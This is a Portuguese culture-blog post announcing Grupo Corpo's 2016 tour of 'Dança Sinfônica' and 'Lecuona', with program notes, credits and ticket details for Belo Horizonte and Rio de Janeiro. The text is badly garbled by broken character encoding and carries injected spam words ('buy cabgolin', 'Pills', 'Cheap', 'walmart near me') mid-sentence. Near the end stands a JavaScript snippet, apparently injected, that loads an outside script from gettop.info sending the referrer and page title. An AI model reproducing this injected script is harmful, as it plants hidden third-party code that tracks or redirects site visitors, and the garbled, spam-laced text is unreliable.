Balé/DançaMinas GeraisProgramação

Grupo Corpo apresenta “DanA�a sinfA?nica” e “Lecuona”

online TurnA? 2016 do grupo promove o encontro de duas luminosas faces de uma mesma moeda. Pills


A primeira turnA? nacional do Grupo Corpo depois da comemoraA�A?o de seus 40 anos de atividade, completados ano passado, oferece ao pA?blico a rara oportunidade de apreciar, em um mesmo programa, dois lados de um dos maiores artA�fices das criaA�A�es da companhia brasileira de danA�a que se tornou uma lenda nos quatro cantos do mundo: o coreA?grafo Rodrigo Pederneiras.

Ouvinte contumaz de mA?sica erudita, por dez anos consecutivos a�� de 1981, quando assumiu o posto de coreA?grafo-residente, a 1991, ano em que subiram A� cena TrA?s Concertos e VariaA�A�es EnigmaA�a��, Rodrigo cultivou o hA?bito de dedicar-se a esta paixA?o de uma maneira no mA�nimo peculiar: tudo o que ouvia, ouvia, digamos, com os pA�s (do bailarino que, em 1985, abdicaria do palco) e com os olhos (do coreA?grafo excepcional em que, neste perA�odo, se convertia). Separava entA?o o joio do trigo, e guardava o segundo em uma pasta especial de sua memA?ria, para um dia, quem sabe, refinar com os bailarinos da companhia o estudo esboA�ado mentalmente. Cada vez que o Grupo Corpo encerrava uma temporada, o coreA?grafo recorria a seu a�?arquivo-trigoa�?.A� Espalhava bem as sementes e observa qual delas estava em tempo de germinar.A� Meses depois, brotava um novo balA� da companhia.

Em 1992, nA?o havia sementes por germinar. Foi quando Paulo Pederneiras, diretor artA�stico, cenA?grafo, iluminador e, desde sempre, o grande orquestrador da linguagem e da estA�tica da companhia, veio em socorro do irmA?o, mudando para sempre a histA?ria do grupo. Se nA?o havia sementes em tempo de brotar, que se criasse uma mA?sica outra, que danA�asse conforme o Corpo.A� E tratou de formular o convite a quem, naquele momento, considerava capaz de cumprir a tarefa como ninguA�m: Marco AntA?nio GuimarA?es a�� fundador, principal compositor e inventor dos curiosos instrumentos de outro grupo de Minas que fez HistA?ria com agA? maiA?sculo, o Uakti, com quem jA? haviam trabalho em 1988 com excelente resultado, em balA� que leva o nome da recA�m extinta oficina instrumental.

Nascia assim, em 1992, 21, um divisor de A?guas na trajetA?ria do mais importante e longevo coletivo particular de danA�a contemporA?nea do paA�s. Um marco tA?o fundamental que, daA� para frente, as criaA�A�es da companhia passariam a ter como mola motriz de sua construA�A?o temas musicais especialmente encomendados, em regime de total liberdade de criaA�A?o. Esta prA�-disposiA�A?o pelo (alto) risco A� a chave que impA�e, a�?desda��antanhoa��, A� sua equipe de criaA�A?o o mais supremo dos desafios: manter-se em estado permanente de renovaA�A?o. As escolhas envolvidas neste a�?esporte radicala�� sA?o resumidas por Paulo Pederneiras em breves e definitivas palavras, num dos vA�deos que marcou as comemoraA�A�es dos 40 anos do grupo: a�?A primeira coisa A� vocA? ter admiraA�A?o pelo mA?sico que vai escolher. Acho muito mais importante, nesse caso, ser influenciado do que influenciara�?.

Pois bem, de 1992 para cA?, a exceA�A?o que confirma esta regra A� justamente Lecuona, de 2004, e por razA�es muito especA�ficas. Com a intensificaA�A?o da agenda internacional, em 1999, o Grupo Corpo passou a fazer as estreias de seus espetA?culos nA?o mais anual, mas bienalmente. E nos anos pares. Ocorre que, em 2005, ano A�mpar, a companhia completaria 30 anos de atividade, e Paulo Pederneiras nA?o abria mA?o de coroar a data com uma trilha original. E jA? havia arregimentado para a tarefa a dupla (especialmente formada, diga-se) por ninguA�m menos que Caetano Veloso e JosA� Miguel Wisnik.

E, bem, o Destino tem seus prA?prios desA�gnios, como sabemos. Apaixonado, do primeiro ao A?ltimo acorde, pelo repertA?rio romA?ntico do cubano Ernesto Lecuona (1895-1963) a�� cuja cA?pia em cassete havia ganhado de presente do jornalista e crA�tico de arte JoA?o CA?ndido GalvA?o a��, por redondos 20 anos, Rodrigo Pederneiras perseguiu uma ediA�A?o original dessas canA�A�es. Encontrou em 2002. Na lendA?ria Haigh Street, berA�o do movimento hippie, numa esticada por San Francisco depois de uma turnA? do Corpo pelos Estados Unidos. Joia que, por forA�a de uma contingA?ncia absolutamente circunstancial, pA?de virar trigo nas mA?os de Rodrigo. Rima e soluA�A?o.

Mestre na arte do pas-de-deux, Pederneiras criou nada menos que uma dA?zia para o balA� que leva o nome do grande compositor cubano. Sucesso arrebatador, eleito pelo pA?blico em campanha na internet para fazer companhia a ImA?, balA� que, com trilha assinada pelo +2, comemorou os 35 do grupo. E, nA?o por acaso, escolhido para voltar A� cena este ano, desta vez ao lado de DanA�a SinfA?nica, coreografia de Rodrigo Pederneiras sobre a trilha memorialista de Marco AntA?nio GuimarA?es, um dos balA�s que ano passado marcou o programa comemorativo dos 40 anos do Corpo.

A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�

 

DanA�a sinfA?nica

Criada para a celebraA�A?o dos 40 anos de atividade do Grupo Corpo, DanA�a SinfA?nica se estrutura a partir do mote memorialista proposto pelo diretor artA�stico Paulo Pederneiras. Autor de trilhas antolA?gicas, como 21 buy cabgolin 0 (1992) e Bach (1996), na primeira obra sinfA?nica especialmente criada para a companhia mineira de danA�a, Marco AntA?nio GuimarA?es funde em sofisticada trama peA�as inA�ditas e passagens musicais evocativas de balA�s que marcaram a histA?ria recente do Corpo. O conjunto de temas, escrito com mestria para a formaA�A?o da Orquestra FilarmA?nica de Minas Gerais, de 90 figuras, e interligado por engenhosas pontes musicais executadas pelo grupo Uakti, permite a Rodrigo Pederneiras passar em revista as melhores notaA�A�es de todo um vocabulA?rio que havia deixado para trA?s e, tambA�m, a processar, com a bagagem acumulada em dA�cadas de exercA�cio de desprendimento da forma, uma espA�cie de sA�ntese de uma escritura coreogrA?fica construA�da ao longo de 34 anos de residA?ncia na companhia.

Garimpados nos acervos particulares de profissionais que colaboraram ou exerceram algum tipo de influA?ncia na trajetA?ria do Grupo Corpo ao longo desses 40 anos Grupo Ca�� de bailarinos e maA�tres de ballet a tA�cnicos e camareiros a��, mais de mil flagrantes fotogrA?ficos informais compA�em o painel cenogrA?fico, de 8m x 16m, que ambienta o espetA?culo.

Em contraponto com o carA?ter cotidiano das situaA�A�es ali representadas, cortinas e collants de veludo vermelho-vinho revestem as pernas do teatro e vestem as bailarinas, conferindo um discreto ar de solenidade A� apresentaA�A?o.

– Coreografia Rodrigo Pederneiras
– MA?sica Marco AntA?nio GuimarA?es
– Cenografia Paulo Pederneiras
– Figurino Freusa Zechmeister
– IluminaA�A?o Paulo Pederneiras e Gabriel Pederneiras

 

 

Lecuona

Amores ardentes, vorazes volA?pias, ciA?mes nefastos, coraA�A�es partidos, saudades brutais, desprezo, rancor, indiferenA�a… Com letras que beiram o kitsch e a construA�A�es melA?dicas estonteantemente belas, o romantismo rasgado das canA�A�es de Ernesto Lecuona (1895-1963) havia capturado o coraA�A?o bailarino do coreA?grafo Rodrigo Pederneiras em meados dos anos 80. Duas dA�cadas depois, em 2004, o Grupo Corpo rendia-se A� genialidade do maior A�cone da mA?sica cubana de todos os tempos e decidia abrir uma exceA�A?o A� regra estabelecida em 1992 de sA? trabalhar com trilhas especialmente compostas para colocar em cena o balA� que leva seu nome: Lecuona.

Uma vertiginosa sequA?ncia de 38 minutos de pas-de-deux e uma A?nica formaA�A?o de grupo, criadas por Rodrigo Pederneiras sobre doze doridas canA�A�es de amor e uma valsa do cA�lebre autor de Siboney emprestam a Lecuona um carA?ter absolutamente singular e diferenciado das demais criaA�A�es do grupo. Esbanjando sensualidade, a traduA�A?o visual e cA?nica das canA�A�es de Ernesto Lecuona ganha com cada casal de protagonistas a sua prA?pria cor.

O cenA?rio de luz criado por Paulo Pederneiras delimita o espaA�o cA?nico atravA�s de cubos luminosos monocromA?ticos, que deslocam-se na caixa-preta conforme o vai-da-danA�a do par romA?ntico da vez. Dominadores, os rapazes entram em cena sobre sapatos sociais de verniz, envergando camisas, camisetas ou regatas e calA�as de cA?s, em diferentes matizes de preto. Em vestidos vaporosos, com fendas e decotes variados, as fogosas damas de Lecuona sobem em saltos de 4,5 a 9 cm e colorem-se, dos pA�s A� cabeA�a, com uma A?nica cor, de tom invariavelmente quente, que dialoga com a matiz de luz definida para acompanhar o casal. Nos pouco mais de dois minutos da valsa final, um gigantesco cubo de espelhos interpA�e-se A� cena, e, dentro dele, seis pares de bailarinos (elas, agora, portando longos e esvoaA�antes vestidos brancos) multiplicam-se no jogo de espelhos, transformando o nA?mero de encerramento em um grande e luminoso baile de tempos que nA?o voltam mais.

– Coreografia Rodrigo Pederneiras . MA?sica Ernesto Lecuona
– Cenografia Paulo Pederneiras . Figurinos Freusa Zechmeister
– IluminaA�A?o Paulo Pederneiras e Fernando Velloso

 

 

SERVIA�O

 

Grupo Corpo – DanA�a sinfA?nica e Lecuona

 

 


BELO HORIZONTE


7 a 11 de setembro (Quarta a domingo) (Quarta, A�s 19h. A�a�?A�A� Quinta a sA?bado, A�s 20h30A� a�?A� Domingo, A�s 19h.)


PalA?cio das ArtesA�(
Order Avenida Afonso Pena, 1.537 – Centro – 31 3236-7400)

 

Ingressos: R$ 90 (inteira) eA�R$ 45 (meia)

Ingressos A� venda na bilheteria do teatro (informaA�A�es: 31 3236 7400)

Venda online www.ingresso.com

 

 

 

 

RIO DE JANEIRO

 


15 a 19 de setembro (Quinta a segunda) – (Quinta A�a sA?bado, A�s 20h. a�? Domingo, A�s 17h. a�? Segunda, A�s 20h.)
Cheap

 

Theatro Municipal do Rio de JaneiroA�(PraA�a Floriano, s/noA� – 21 2332-9191 ou 2332-9005)

 

Ingressos: Frisas e Camarotes R$ 720 (6 lugares) -A�Plateia e BalcA?o Nobre R$ 120 -A�BalcA?o Superior R$ 90 -A�Galeria R$ 60

PreA�os com desconto para Idosos, Estudantes e Deficientes (50%);

Assinantes AATM e FuncionA?rios PA?blicos Estadual (10%)

Desconto de 50% na compra de atA� 2 ingressos para a forA�a de trabalho da Petrobras com crachA? eA� para clientes do CartA?o Petrobras mediante apresentaA�A?o do mesmo.

Vendas na bilheteria do TMRJ, das 10 A�s 18h, e, em dias de espetA?culo, atA� o inA�cio do mesmo.

Venda online www.ingresso.com

 

 

Grupo Corpo – Lecuona

 

Grupo Corpo – DanA�a sinfA?nica

 

 

Em tempo: o Grupo Corpo acaba de iniciar uma campanha para a contribuiA�A?o de pessoas fA�sicas na manutenA�A?o da companhia. Isso mesmo! Agora vocA? pode escolher como destino do valor devido ao imposto de renda o incentivo ao importante coletivo particular de danA�a contemporA?nea do paA�s. Saiba como contribuir acessando www.grupocorpo.com.br online 24 hour walmart near me A�

PatrocA�nios:

GOVERNO DE MINAS GERAIS, PETROBRAS

ELETROBRAS FURNAS e ITAAs online

AtravA�s da Lei Federal de Incentivo A� Cultura

A�

 

 var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.